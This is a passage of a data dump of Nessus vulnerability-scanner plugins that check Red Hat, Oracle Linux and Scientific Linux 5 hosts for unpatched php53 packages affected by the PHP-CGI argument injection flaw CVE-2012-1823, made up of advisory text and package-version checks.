sp:\"6\", cpu:\"x86_64\", reference:\"php53-bcmath-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-cli-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-cli-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-cli-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-common-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-common-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-common-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-dba-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-dba-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-dba-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-devel-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-devel-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-devel-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-gd-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-gd-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-gd-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-imap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-imap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-imap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-intl-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-intl-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-intl-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-ldap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-ldap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-ldap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-mbstring-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-mbstring-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-mbstring-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-mysql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-mysql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-mysql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-odbc-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-odbc-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-odbc-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-pdo-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-pdo-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-pdo-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-pgsql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-pgsql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-pgsql-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-process-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-process-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-process-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-pspell-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-pspell-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-pspell-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-snmp-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-snmp-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-snmp-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-soap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-soap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-soap-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-xml-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-xml-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-xml-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-xmlrpc-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-xmlrpc-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-xmlrpc-5.3.3-1.el5_6.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53 / php53-bcmath / php53-cli / php53-common / php53-dba / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:11:32", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0547 :\n\nUpdated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "ORACLELINUX_ELSA-2012-0547.NASL", "href": "https://www.tenable.com/plugins/nessus/68525", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : php53 (ELSA-2012-0547)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0547 and \n# Oracle Linux Security Advisory ELSA-2012-0547 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68525);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/30 10:58:17\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_bugtraq_id(53388);\n script_xref(name:\"RHSA\", value:\"2012:0547\");\n\n script_name(english:\"Oracle Linux 5 : php53 (ELSA-2012-0547)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0547 :\n\nUpdated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration using the PHP\nmodule for Apache httpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-May/002795.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php53 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53 / php53-bcmath / php53-cli / php53-common / php53-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:47:09", "bulletinFamily": "scanner", "description": "PHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2012-08-01T00:00:00", "id": "SL_20120507_PHP53_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61311", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : php53 on SL5.x i386/x86_64 (20120507)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61311);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-1823\");\n\n script_name(english:\"Scientific Linux Security Update : php53 on SL5.x i386/x86_64 (20120507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823) \n\nScientific Linux is aware that a public exploit for this issue is\navailable that allows remote code execution in affected PHP CGI\nconfigurations. This flaw does not affect the default configuration\nusing the PHP module for Apache httpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1205&L=scientific-linux-errata&T=0&P=470\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?59eb10cb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-debuginfo-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53 / php53-bcmath / php53-cli / php53-common / php53-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:49:20", "bulletinFamily": "scanner", "description": "Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe 